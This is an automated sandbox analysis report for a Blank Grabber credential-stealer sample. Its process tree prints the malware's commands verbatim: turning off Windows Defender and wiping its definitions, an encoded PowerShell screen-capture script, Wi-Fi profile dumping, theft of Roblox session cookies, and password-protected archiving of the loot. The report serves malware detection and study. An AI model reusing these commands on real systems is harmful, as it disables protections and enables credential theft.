Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HeilHitler.exe

Overview

General Information

Sample name:HeilHitler.exe
Analysis ID:1556385
MD5:aeab677edfb0b7838ad440c071a04965
SHA1:9855bbfe1e4d729853c1d3fd5e51a6d767cf8203
SHA256:e465cccde051595262dc76359e4a06279341b4292901a49061cf9fa1386119df
Tags:BlankGrabberexeuser-likeastar20
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • HeilHitler.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\HeilHitler.exe" MD5: AEAB677EDFB0B7838AD440C071A04965)
    • HeilHitler.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\HeilHitler.exe" MD5: AEAB677EDFB0B7838AD440C071A04965)
      • cmd.exe (PID: 7496 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 2008 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • powershell.exe (PID: 7600 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7504 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7608 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 7580 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7796 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7960 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7812 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7968 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8068 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7212 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8080 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7232 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8100 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7208 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 2148 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 5216 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 1928 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 5416 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 600 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8084 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 5064 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7884 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D0C.tmp" "c:\Users\user\AppData\Local\Temp\0qdpbrpq\CSC1A48FA887436480A8B41407A32798B3.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 824 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 1012 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 5940 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 8072 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7692 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8028 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 1704 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 7512 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 7600 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 5228 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 4996 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 5300 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7656 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3288 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 1848 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7640 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7920 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 3400 cmdline: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 7536 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8092 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7820 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5696 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7224 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7712 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
